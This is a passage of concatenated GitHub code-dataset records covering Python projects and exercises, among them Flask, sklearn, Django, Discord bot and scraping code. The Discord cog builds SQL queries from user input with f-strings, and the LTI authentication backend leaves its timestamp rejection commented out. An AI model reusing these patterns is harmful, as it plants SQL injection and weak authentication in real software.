\"{images_folder}/{vac_name}/{img}\".format(images_folder=x[1], vac_name=x[2], img=x[3])\n image_file = url_for('static', filename=path)\n final_photos.append(image_file)\n\n return render_template('photo_gallery.html', name=name, photos=final_photos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"leeb2828/vacation-photo-gallery","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33941893860","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing\n\n# Atribute selection\nfrom sklearn.feature_selection import SelectFromModel # Regularization (L1 norm)\nfrom sklearn.linear_model import LogisticRegression\n\n#sklearn variaos:\nfrom sklearn.model_selection import train_test_split\n\n#Classifiers:\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\n\n\n# Load from a CSV\ndataproy = pd.read_csv(r\"C:\\Users\\julen\\Desktop\\UNIVERSIDAD\\4A\\SCCBD (Smart Cities Ciberseguridad y Big Data)\\Bigdata\\EntregableS5_Julen\\Household energy bill data.csv\") \n\n# Attribute information // me da los tipos de cada columna\nprint(dataproy.info())\n\n#---------------------------------------------------------------------------------------------------------------\n\n###NOISE\nmu, sigma = 0, 0.1 \n# creating a noise \nnoise = np.random.normal(mu, sigma, [1000,1]) \nprint(noise)\ndataproy['noise'] = noise\n\n#---------------------------------------------------------------------------------------------------------------\n\n###RANGOS\n# Binning numerical columns //dividimos en 10 grupos dependiendo del amouint paid\n# // creamos una nueva columna con estos grupos\n# Using Pandas //reparte en 10 grupes del mismo tamaño\ndataproy['Cat_amount_paid'] = pd.qcut(dataproy['amount_paid'], q=10, labels=False )\n\n####ATRIBUTE SELECTION\n\n#Quitamos la columna del amount_paid\ndataproy2 = dataproy.drop(['amount_paid', 'Cat_amount_paid'],axis=1)\nprint(dataproy2.info())\n\n\n# # Brute force with coorrelation // no lo usamos porque da correlaciones muyb pequeñas y no es util\n# # Unsupervised Features correlation \n# X = dataproy2\n# correlated_features = set()\n# _correlation_matrix = X.corr(method='spearman')\n# for i in range(len(_correlation_matrix.columns)):\n# for j in range(i):\n# if abs(_correlation_matrix.iloc[i, j]) > 0.1:\n# _colname = _correlation_matrix.columns[i]\n# correlated_features.add(_colname)\n\n# print(\"Unsupervised brute force\")\n# print(\"Strong correlated features\")\n# print(_correlation_matrix)\n# print(correlated_features)\n\n# Split in train and test datasets\n# 2D Attributes\nX = dataproy2\ny = dataproy['Cat_amount_paid'] \nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=6)\n\n# Regularization (L1 norm)\n# Using sklearn.feature_selection.SelectFromModel\n\n\nlogistic = LogisticRegression(penalty='l1', solver='saga', multi_class='multinomial', max_iter=10000)\nsfm = SelectFromModel(estimator=logistic)\nsfm.fit(X, y)\nfeature_importances = pd.DataFrame({'feature':X.columns,'importance':sfm.get_support()})\n\nprint(\"Regularization (L1 norm) Embedded approach\")\nprint(feature_importances)\n\n\n\n#----------------------------------------------------------------------------------------------------------\n#####ELECCIÓN DEL CLASIFICADOR CON LOS MEJORES VCALORES\n# DecisionTreeClassifier\nprint('DecisionTreeClassifier OPTIMIZADO...')\ntree_model2 = DecisionTreeClassifier(criterion='gini', max_depth=10, splitter='random', random_state=1)\ntree_model2.fit(X_train, y_train)\n\n\n# test prediction\ny_pred = tree_model2.predict(X_test)\nprint('Accuracy con optimizado: %.2f%%' % (100.0 * tree_model2.score(X_test, y_test)))\nprint('Sin nada optimizado: ', classification_report(y_test, y_pred)[-162:]) #classification report// me da el porcentaje\n","repo_name":"juleneetac/bigdataproyecto","sub_path":"noise+atributeselection_proy.py","file_name":"noise+atributeselection_proy.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27335805372","text":"def tempoCristo(time):\n ano = 2015 - time\n texto = f\"{ano} D.C.\"\n if ano <= 0:\n ano = 1 + ano*-1\n texto = f\"{ano} A.C.\"\n \n return texto\n\nfor _ in range(int(input())):\n print(tempoCristo(int(input())))","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/Há Muito, Muito Tempo Atrás.py","file_name":"Há Muito, Muito Tempo Atrás.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69815205586","text":"import pandas as pd\n\n\nurl = 'https://stepik.org/media/attachments/lesson/245290/trekking2.xlsx'\ncalorific = pd.read_excel(url, sheet_name=0, index_col=0).fillna(0)\nweight = pd.read_excel(url,\tsheet_name=1, index_col=0)\nration = calorific.join(weight, how='inner')\n\n\nprint(*ration.apply(lambda x: x * x[-1] / 100, axis=1).sum(axis=0).astype('int'))\n\n\n\n# Васю назначили завхозом в туристической группе и он подошёл к подготовке ответственно, составив справочник\n# продуктов с указанием калорийности на 100 грамм, а также содержание белков, жиров и углеводов на 100 грамм продукта.\n# Ему не удалось найти всю информацию, поэтому некоторые ячейки остались незаполненными (можно считать их значение равным нулю).\n# Также он использовал какой-то странный офисный пакет и разделял целую и дробную часть чисел запятой.\n# Таблица доступна по ссылке https://stepik.org/media/attachments/lesson/245290/trekking2.xlsx\n#\n# Вася составил раскладку по продуктам на один день (она на листе \"Раскладка\") с указанием названия продукта\n# и его количества в граммах. Посчитайте 4 числа: суммарную калорийность и граммы белков, жиров и углеводов.\n# Числа округлите до целых вниз и введите через пробел.\n# Информация о каждом дне должна выводиться в отдельной строке.","repo_name":"ddr533/Python_for_practice-stepic_course","sub_path":"Part2__pandas__zip/2.3.2.py","file_name":"2.3.2.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25278200097","text":"import json\nimport logging\nimport random\nfrom datetime import datetime, timedelta\nfrom random import randrange\n\nimport environ\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom clients.chat import send_telegram_message\nfrom clients.cron import set_crons\nfrom clients.logs import ManagementCommandsHandler\nfrom crons.models import Cron\n\n\ndef get_tomorrow_run() -> datetime:\n tomorrow = datetime.today() + timedelta(days=1)\n start = tomorrow.replace(hour=9, minute=30, second=0, microsecond=0)\n end = start + timedelta(hours=13)\n return start + timedelta(seconds=randrange((end - start).seconds))\n\n\nclass Command(BaseCommand):\n def handle(self, *_, **__):\n logger = logging.getLogger(__name__)\n logger.addHandler(ManagementCommandsHandler())\n\n config = environ.Env()\n logger.info(\"It's time to take a picture...\")\n data_path = settings.BASE_DIR / \"bots\" / \"management\" / \"commands\" / \"data\"\n\n with open(data_path / \"saluturi.json\", \"r\") as salut_file:\n salut = random.choice(json.load(salut_file))\n with open(data_path / \"actions.json\", \"r\") as actions_file:\n action = random.choice(json.load(actions_file))\n\n text = f\"❗️📷 {salut} {action} 📷❗️\"\n send_telegram_message(\n chat_id=config(\"BE_REAL_CHAT_ID\"),\n text=text,\n disable_notification=False,\n )\n\n tomorrow_run = get_tomorrow_run().replace(second=0, microsecond=0)\n expression = f\"{tomorrow_run.minute} {tomorrow_run.hour} {tomorrow_run.day} {tomorrow_run.month} *\"\n Cron.objects.filter(command__contains=\"be_real\").update(expression=expression)\n set_crons(\n [\n Cron(\n command=\"be_real\",\n expression=expression,\n is_active=True,\n is_management=True,\n )\n ]\n )\n logger.info(\n f\"Set next run and cron to {tomorrow_run.strftime('%H:%M %d.%m.%Y')}\"\n )\n\n return self.stdout.write(self.style.SUCCESS(\"Done.\"))\n","repo_name":"andreipradan/mainframe","sub_path":"backend/bots/management/commands/be_real.py","file_name":"be_real.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74832674066","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.coupang.com/np/search?component=&q=%EB%85%B8%ED%8A%B8%EB%B6%81&channel=user\"\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Whale/2.11.126.19 Safari/537.36\"}\nres = requests.get(url)\nres.raise_for_status()\nsoup = BeautifulSoup(res.text, \"lxml\")\n\nitems = soup.find_all(\"li\", attrs={\"class\":re.compile(\"^search-product\")})\nprint(items[0].find(\"div\", attrs={\"class\":\"name\"}).get_text())\n","repo_name":"Jarry-Ha/TIL_github","sub_path":"1_python/1.study/2_RPA/nadocoding/9_bs4_coupang.py","file_name":"9_bs4_coupang.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73694560784","text":"\"\"\"Backend class to authenticate LTI requests.\"\"\"\nfrom time import time\nfrom typing import Mapping, Optional\n\nimport oauth2\nfrom django import http\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import Group\nfrom django.core.exceptions import PermissionDenied\n\nfrom ontask import LOGGER\nfrom ontask.lti.tool_provider import DjangoToolProvider\n\n\nclass LTIAuthBackend(ModelBackend):\n \"\"\"Class to authenticate an LTI request.\n\n By default, the ``authenticate`` method creates ``User`` objects for\n usernames that don't already exist in the database. Subclasses can disable\n this behavior by setting the ``create_unknown_user`` attribute to\n ``False``.\n \"\"\"\n # Create a User object if not already in the database?\n create_unknown_user = True\n # Username prefix for users without a sis source id\n unknown_user_prefix = 'cuid:'\n\n def authenticate(\n self,\n request: http.HttpRequest,\n username: Optional[str] = None,\n password: Optional[str] = None,\n **kwargs: Mapping,\n ):\n \"\"\"Try to authenticate an LTI request.\"\"\"\n if settings.DEBUG:\n LOGGER.info('Begin authentication process')\n\n if not request:\n if settings.DEBUG:\n LOGGER.info('No request object in authentication')\n return None\n\n request_key = request.POST.get('oauth_consumer_key')\n\n if request_key is None:\n LOGGER.debug(\n 'Request does not contain an oauth_consumer_key. Stopping')\n return None\n\n if not settings.LTI_OAUTH_CREDENTIALS:\n LOGGER.debug('Missing LTI_OAUTH_CREDENTIALS in settings')\n raise PermissionDenied\n\n secret = settings.LTI_OAUTH_CREDENTIALS.get(request_key)\n\n if secret is None:\n LOGGER.debug('Could not get a secret for key %s', request_key)\n raise PermissionDenied\n\n LOGGER.debug('using key/secret %s', request_key)\n tool_provider = DjangoToolProvider(\n request_key,\n secret,\n request.POST.dict())\n\n postparams = request.POST.dict()\n\n LOGGER.debug('Request is secure: %s', request.is_secure())\n if settings.DEBUG:\n for key in postparams:\n LOGGER.debug('POST %s: %s', key, postparams.get(key))\n LOGGER.debug('Request abs url is %s', request.build_absolute_uri())\n\n for key in request.META:\n LOGGER.debug('META %s: %s', key, request.META.get(key))\n\n LOGGER.info('Checking the signature')\n\n try:\n request_is_valid = tool_provider.is_valid_request(request)\n except oauth2.Error:\n LOGGER.exception(\n 'error attempting to validate LTI launch %s',\n postparams)\n request_is_valid = False\n\n if not request_is_valid:\n LOGGER.error('Invalid request: signature check failed.')\n raise PermissionDenied\n\n LOGGER.info('done checking the signature')\n LOGGER.info(\n 'about to check the timestamp: {%s}',\n int(tool_provider.oauth_timestamp))\n\n if time() - int(tool_provider.oauth_timestamp) > 60 * 60:\n LOGGER.error('OAuth timestamp is too old.')\n # raise PermissionDenied\n else:\n LOGGER.info('Valid timestamp')\n\n LOGGER.info('Done checking the timestamp')\n\n # (this is where we should check the nonce)\n\n # if we got this far, the user is good\n\n user = None\n\n # Retrieve username from LTI parameter or default to an overridable\n # function return value\n username = (\n tool_provider.lis_person_sourcedid or\n self.get_default_username(\n tool_provider,\n prefix=self.unknown_user_prefix))\n\n email = tool_provider.lis_person_contact_email_primary\n first_name = tool_provider.lis_person_name_given\n last_name = tool_provider.lis_person_name_family\n roles = tool_provider.roles\n\n # Check that we have an email field at least\n if not email:\n LOGGER.error('Invalid request: Invalid email.')\n raise PermissionDenied\n\n LOGGER.info('Valid username: %s', username)\n\n user_model = get_user_model()\n\n # Note that this could be accomplished in one try-except clause, but\n # instead we use get_or_create when creating unknown users since it has\n # built-in safeguards for multiple threads.\n if self.create_unknown_user:\n user, created = user_model.objects.get_or_create(email=email)\n\n if created:\n LOGGER.debug(\n 'Authenticate created a new user for %s',\n username)\n else:\n LOGGER.debug(\n 'Authenticate found an existing user for %s',\n username)\n\n else:\n LOGGER.debug(\n 'automatic user creation disbled. Find and existing record')\n try:\n user = user_model.objects.get_by_natural_key(username)\n except user_model.DoesNotExist:\n LOGGER.debug('authenticate could not find user %s', username)\n\n # update user information if given by LTI and not present in user obj.\n if not user.name and username:\n user.name = username\n if not user.name and first_name and last_name:\n user.name = first_name + ' ' + last_name\n\n # check if substring group_role in the user's launch roles\n should_be_in_instructor_group = any(\n group_role_substring in roles\n for group_role_substring in settings.LTI_INSTRUCTOR_GROUP_ROLES\n )\n if (\n should_be_in_instructor_group\n and not user.groups.filter(name='instructor').exists()\n ):\n user.groups.add(Group.objects.get(name='instructor'))\n\n user.save()\n LOGGER.debug('Updated the user record in the database')\n\n return user\n\n @staticmethod\n def get_default_username(tool_provider, prefix=''):\n \"\"\"Return a default username value from tool_provider.\n\n This is needed in case offical LTI param lis_person_sourcedid is not\n present.\n \"\"\"\n # Default back to user_id lti param\n uname = tool_provider.get_custom_param(\n 'canvas_user_id') or tool_provider.user_id\n return prefix + uname\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/django_auth_lti/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"5372028081","text":"# -*-encode=utf-8-*-\n\nimport numpy as np\nfrom scipy.misc import imread\n\n\ntheta = np.load('./theta68.txt')\nimage = imread('./nine.png')\nimage = image.reshape(image.shape[0] * image.shape[1], 1)\na = np.exp(theta * image)\nb = np.sum(np.exp(theta * image), axis=0)\nr = a / b\nmax = r[0]\nindex = 0\nsum = 0\nfor i, e in enumerate(r):\n sum += e\n if e > max:\n max = e\n index = i\nprint(sum)\nprint('---')\nprint(r)\nprint('digit is:%d' % index)","repo_name":"FrankLeeC/MachineLearning","sub_path":"softmax/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"852252347","text":"class test:\r\n def __init__(self):\r\n self.a = 10\r\n self.b = 20\r\n def inva(self):\r\n print('insid access variable:',self.a)\r\nt = test()\r\nt.inva()\r\nprint('out side access variable:',t.b) \r\n\r\n\r\nclass test:\r\n def __init__(self):\r\n self.a = 10\r\n self.b = 20\r\n self.c = 30\r\n def inva(self):\r\n del self.a\r\nt = test()\r\nprint(t.__dict__) \r\n\r\nt1 = test()\r\nt1.inva()\r\ndel t1.c\r\nprint('t1 object print:',t1.__dict__)\r\n\r\nt2 = test()\r\ndel t2.a,t2.b\r\nprint('t2 object will print:',t2.__dict__)","repo_name":"harishramuk/python-handson-exercises","sub_path":"268. clss.py","file_name":"268. clss.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20601810097","text":"from discord.ext import commands\nfrom modules.functions import *\nfrom modules.config import config\n\nimport discord\nimport pymysql\n\n\nmysql_host = config[\"MysqlHost\"]\nmysql_user = config[\"MysqlId\"]\nmysql_password = config[\"MysqlPw\"]\nmysql_db = config[\"MysqlDb\"]\nEcheck = '\\N{WHITE HEAVY CHECK MARK}'\n\nclass ServerModerator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='customTitle')\n async def _setTitle(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set Custom Title.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Custom title should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET customTitle=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed customTitle.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"custom Title has been changed successfully.\",value=f\"New customTitle: {settings}\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('The custom title has been changed successfully.', delete_after=10)\n\n @commands.command(name='customText')\n async def _setText(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set Custom Text.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Custom text should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET customText=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed customText.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"custom Text has been changed successfully.\",value=f\"New customText: {settings}\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('The custom text has been changed successfully.', delete_after=10)\n\n @commands.command(name='role')\n async def _setRole(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set the roles to be give to users who successfully authenticate.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Role should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET verify_role=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed Role.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"Role has been changed successfully.\",value=f\"New Role: {settings}\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('Role has been changed successfully.', delete_after=10)\n\n\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n guildName = str(guild.name)\n guildId = str(guild.id)\n guildOwnerId = str(guild.owner_id)\n guildOwnerName = str(guild.owner)\n guildOwner = self.bot.get_user(guildOwnerId)\n NoticeChannelName = \"Guardian Notice\"\n\n printt(f\"{Fore.LIGHTBLUE_EX}{guildName}({guildId}){Fore.LIGHTYELLOW_EX} New Server Detect!\")\n \n #Todo: Get Category\n try:\n category = discord.utils.get(guild.categories, name=\"Guardian\")\n except: #if it has something wrong, Create a Auth Category\n printt(f'{Fore.RED}Guardian Category is not found at {guildName} so i will make a one.')\n category = await guild.create_category(\"Guardian\")\n if category == None:\n printt(f'{Fore.RED}Guardian Category is not found at {guildName} so i will make a one.')\n category = await guild.create_category(\"Guardian\")\n \n #Todo: Create a Channel And Set Permission\n try:\n channel = discord.utils.get(guild.channels, name=NoticeChannelName)\n except:\n channel = await guild.create_text_channel(NoticeChannelName, category=category)\n channel_overwrite = discord.PermissionOverwrite()\n channel_overwrite.read_messages = False\n channel_overwrite.read_message_history = False\n channel_overwrite.send_messages = False\n await channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n if channel == None:\n channel = await guild.create_text_channel(NoticeChannelName, category=category)\n channel_overwrite = discord.PermissionOverwrite()\n channel_overwrite.read_messages = False\n channel_overwrite.read_message_history = False\n channel_overwrite.send_messages = False\n await channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n\n # #Todo: Create a Role named \"Verified\"\n # await guild.create_role(name=\"verified\")\n # role = discord.utils.get(guild.roles, name=\"verified\")\n\n # #set All channels Role\n # guild_channels = []\n # for guild in self.bot.guilds:\n # for channel in guild.channels:\n # overwrite = discord.PermissionOverwrite()\n # overwrite.read_messages = True\n # overwrite.read_message_history = True\n # overwrite.send_messages = True\n # overwrite.manage_channels = True\n # await channel.set_permissions(guild.me, overwrite=overwrite)\n # #set @everyone permissions\n # channel_overwrite = discord.PermissionOverwrite()\n # channel_overwrite.read_messages = False\n # channel_overwrite.read_message_history = False\n # channel_overwrite.send_messages = False\n # await channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n # #set Role permissions\n # overwritee = discord.PermissionOverwrite()\n # overwritee.read_messages = True\n # overwritee.read_message_history = True\n # overwritee.send_messages = True\n # await channel.set_permissions(role, overwrite=overwritee)\n\n #commit the data\n cur.execute(f'INSERT INTO servers VALUES({guildId}, \"{category.id}\", \"\", \"\", {channel.id}, \"verified\") ON DUPLICATE KEY UPDATE guild_id={guildId}, category_id=\"{category.id}\", customText=\"\", noticeChannel={channel.id}, verify_role=\"verified\"')\n conn.commit()\n cur.close()\n\n #make a discord embed\n embed = discord.Embed(title=\"Thank you for using the Guardian!\", color=0x62c1cc)\n embed.add_field(name=\"Please don't delete and edit This channel!\",value=f\"User's captcha log, developer's announcement will be send on this channel! If you modify the name of this channel, the bot will not work smoothly, so please do not modify or delete this channel!\",inline=False)\n embed.add_field(name=\"Where is the commands list?\",value=f\"please enter the command **{config['BotPrefix']}help** .\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n msg = await channel.send(embed = embed)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ServerModerator(bot))","repo_name":"zeee2/Guardian","sub_path":"cogs/ServerModerator.py","file_name":"ServerModerator.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71655831827","text":"import radio\r\nfrom microbit import *\r\n\r\n# The radio won't work unless it's switched on.\r\nradio.on()\r\nradio.config(channel=7)\r\n\r\n# keep score\r\nmessages_rec = 0\r\n\r\n# Event loop.\r\nwhile True:\r\n # Button A sends ping\r\n if button_a.was_pressed():\r\n radio.send('ping')\r\n # Button B prints total so far \r\n if button_b.was_pressed():\r\n display.scroll(messages_rec)\r\n # Read any incoming messages.\r\n incoming = radio.receive()\r\n if incoming == 'ping':\r\n display.show(Image.SQUARE_SMALL, delay=100, wait=False, clear=True)\r\n messages_rec += 1","repo_name":"Pratt-Institute/MicroPython4MicroBit","sub_path":"radio-ping-pong.py","file_name":"radio-ping-pong.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4533571078","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, TIMESTAMP, DateTime, func\nfrom sqlalchemy.dialects.mysql import BIGINT\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.schema import ForeignKey\nfrom datetime import datetime\n\nBase = declarative_base()\n\nclass PipelineRecord(Base):\n\n __tablename__ = 'pipeline'\n\n id = Column(Integer, primary_key=True)\n\n pipeName = Column('pipe_name', String(100))\n pipeID = Column('pipe_id', Integer())\n status = Column(String(100))\n timestamp = Column(TIMESTAMP, server_default=func.current_timestamp(), onupdate=func.current_timestamp())\n pipeDir = Column('pipe_dir', String(200))\n addendum = Column(String(200))\n\n def __init__(self, pipe, status = None, addendum = None):\n\n self.pipeName = pipe.name\n self.pipeID = pipe.pipeID\n self.status = status\n self.pipeDir = pipe.pipeDir\n if addendum:\n self.addendum = addendum\n\n def __repr__(self):\n return \"\" % (self.pipeName, self.pipeID)\n\n\nclass ModuleRecord(Base):\n\n __tablename__ = 'module'\n\n id = Column(Integer, primary_key=True)\n\n modName = Column('mod_name', String(50))\n modID = Column('mod_id', Integer())\n\n pipeName = Column('pipe_name', String(100))\n pipeID = Column('pipe_id', Integer())\n\n status = Column(String(100))\n\n pid = Column('process_id', Integer())\n jobID = Column('job_id', Integer())\n\n runType = Column('run_type', String(50))\n hostname = Column('host', String(50))\n \n timestamp = Column(TIMESTAMP, server_default=func.current_timestamp(), onupdate=func.current_timestamp())\n modArgs = Column('mod_args', String(1000))\n slurmArgs = Column('slurm_args', String(1000))\n addendum = Column(String(200))\n\n def __init__(self, mod, status = None, addendum = None):\n\n self.modName = mod.name\n self.modID = mod.modID\n\n self.pipeName = mod.pipe.name\n self.pipeID = mod.pipe.pipeID\n\n self.status = status\n\n if mod.runType:\n self.runType = mod.runType\n\n if mod.hostname:\n self.hostname = mod.hostname\n\n if mod.pid:\n self.pid = mod.pid\n \n if mod.jobID:\n self.jobID = mod.jobID\n\n if mod.modConfig.argsJson:\n self.modArgs = mod.modConfig.argsJson\n\n if mod.slurmConfig.argsJson:\n self.slurmArgs = mod.slurmConfig.argsJson\n\n if addendum:\n self.addendum = addendum\n\n def __repr__(self):\n return \"\" % (self.modName, self.modID, self.pipeName, self.pipeID)\n\n\nclass MaxID(Base):\n\n __tablename__ = 'max_id'\n\n id = Column(Integer, primary_key=True)\n\n pipeID = Column('pipe_id', Integer()) #at obj instantiation, modID and pipeID are set to None.\n modID = Column('mod_id', Integer())\n\n\n def __init__(self):\n\n self.pipeID = 0 #set defaults\n self.modID = 0\n\n\n \ndef getBase():\n return Base\n\n\n\n\n","repo_name":"harvardinformatics/IggyTools","sub_path":"IggyTools/iggytools/iggypipeline/sqlalchemy_models.py","file_name":"sqlalchemy_models.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3345118386","text":"from dataset import *\nfrom train import *\nfrom UNET import *\n\n\ndef main():\n\n unet = UNET(4, 2)\n\n base_path = Path(\"../input/38-Cloud_training\")\n dataset = CloudDastaset(\n base_path / \"train_red\",\n base_path / \"train_green\",\n base_path / \"train_blue\",\n base_path / \"train_nir\",\n base_path / \"train_gt\",\n )\n # print(\"dataset has a length of: \", len(dataset))\n # print('torch: ',torch.__version__)\n # print('torchcuda available: ',torch.cuda.is_available())\n # print(torch.__file__)\n\n train_val_size = (int(len(dataset) * 7 / 10)), int(len(dataset) * 3 / 10)\n train_ds, valid_ds = torch.utils.data.random_split(dataset, train_val_size)\n train_dl = DataLoader(train_ds, batch_size=10, shuffle=True)\n valid_dl = DataLoader(valid_ds, batch_size=10, shuffle=True)\n\n loss_fn = nn.CrossEntropyLoss()\n opt = torch.optim.Adam(unet.parameters(), lr=0.01)\n\n \n train_loss, valid_loss = train(\n unet, train_dl, valid_dl, loss_fn, opt, acc_metric, epochs=25\n )\n \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LeBrav/CloudSegmentation","sub_path":"workspace/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14883179446","text":"def fuel(numbers, target, costs):\n f = 0\n for n in numbers:\n steps = abs(target - n)\n f += costs[steps]\n return f\n\n\ndef main():\n with open(\"input.txt\") as f:\n line = f.readline()\n numbers = [int(nr) for nr in line.split(\",\")]\n print(f\"{len(numbers)} numbers read\")\n\n costs = {}\n max_dist = abs(min(numbers) - max(numbers))\n cost = 0\n total_cost = 0\n for t in range(0, max_dist + 1):\n costs[t] = total_cost\n cost += 1\n total_cost += cost\n print(costs)\n\n min_fuel = costs[max_dist] * len(numbers)\n for t in range(min(numbers), max(numbers) + 1):\n f = fuel(numbers, t, costs)\n min_fuel = min(min_fuel, f)\n print(t, f)\n\n result = min_fuel\n print(f\"Result: {result}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mkopec87/advent_of_code","sub_path":"src/2021/day07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26088802009","text":"class Solution:\n def 